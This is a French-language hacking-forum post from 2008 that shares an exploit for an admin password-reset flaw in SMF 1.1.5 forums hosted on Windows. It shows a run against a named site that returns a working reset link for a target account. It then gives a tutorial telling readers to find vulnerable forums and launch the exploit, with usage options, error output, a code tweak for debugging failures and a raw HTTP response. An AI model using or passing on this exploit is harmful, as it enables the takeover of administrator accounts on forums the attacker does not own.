by JTC » Mon Sep 08, 2008 9:55 am
slt à tous ;
hier une faille smf 1.1.5 seulement pour ceux qui heberges sous windows a ete decouverte :
http://milw0rm.com/exploits/6392
exemple d'utilisation
18:41:07 fuck ~ $ php nop.php nopinjection.com /nopinjection/ --userid=444 --username=Stargatemaster
---------------------------------------------------------------
SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)
(c)oded by Raz0r (http://Raz0r.name/)
---------------------------------------------------------------
[~] Connecting to nopinjection.com ... OK
* Seed for next random number is 3289
* Success! To set password visit this link:
http://nopinjection.com/nopinjection/index.php?action=reminder;sa=setpassword;u=444;code=c1fcf5e107
# milw0rm.com [2008-09-06]
bien entendu la faille a ete corrigé :)
[b:e76b97398e]petit tuto :[/b:e76b97398e]
[color=yellow:e76b97398e]si tu es windows, regarde ce tutoriel:[/color:e76b97398e] http://www.siteduzero.com/tutoriel-3-33412-executer-php-en-cli-console.html
Trouve un forum smf 1.1.5 hébergé sous windows ( ce qui est plutôt rare) puis tu lance l'exploit:
[b:e76b97398e][color=yellow:e76b97398e]USAGE:
~~~~~~[/color:e76b97398e][/b:e76b97398e]
[code:1:e76b97398e]php smf.php [host] [path] OPTIONS
[host] - target server where SMF is installed
[path] - path to SMF
OPTIONS:
--userid=[value] (default: 1)
--username=[value] (default: admin)
examples:
php smf.php site.com /forum/
php smf.php site.com / --userid=2 --username=odmen[/code:1:e76b97398e]
[color=red:e76b97398e]si ca te met :[/color:e76b97398e]
[code:1:e76b97398e][~] Connecting to site.com ... OK
PHP Notice: Undefined variable: md5 in C:\repertoire\exploit.php on line 91
[-] Random number hash not found[/code:1:e76b97398e]
c'est que le site n'est pas hebergé sous Windows mais sur par exemple sous une distrib linux
voici une commande à mettre dans le script pour des infos sur les raisons de l'échec
donc tu vas mettre:
[code:1:e76b97398e] } else print $resp;
}[/code:1:e76b97398e]
après [color=red:e76b97398e]break;[/color:e76b97398e]
[color=yellow:e76b97398e]ce qui donne :[/color:e76b97398e]
[code:1:e76b97398e]while(!feof($ock)) {
$resp = fgets($ock);
preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
if(isset($out[1])) {
$md5 = $out[1];
break;
} else print $resp;
}[/code:1:e76b97398e]
[color=yellow:e76b97398e]tu aura comme réponse ca:[/color:e76b97398e]
[b:e76b97398e]HTTP/1.1 302 Found
Date: Mon 08 Sep 2008 07:30:53 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
Expires: Thu 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Location: http://www.site.com/forum/index.php?www;action=reminder
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5 max=100
Connection: Keep-Alive
Content-Type: text/html[/b:e76b97398e]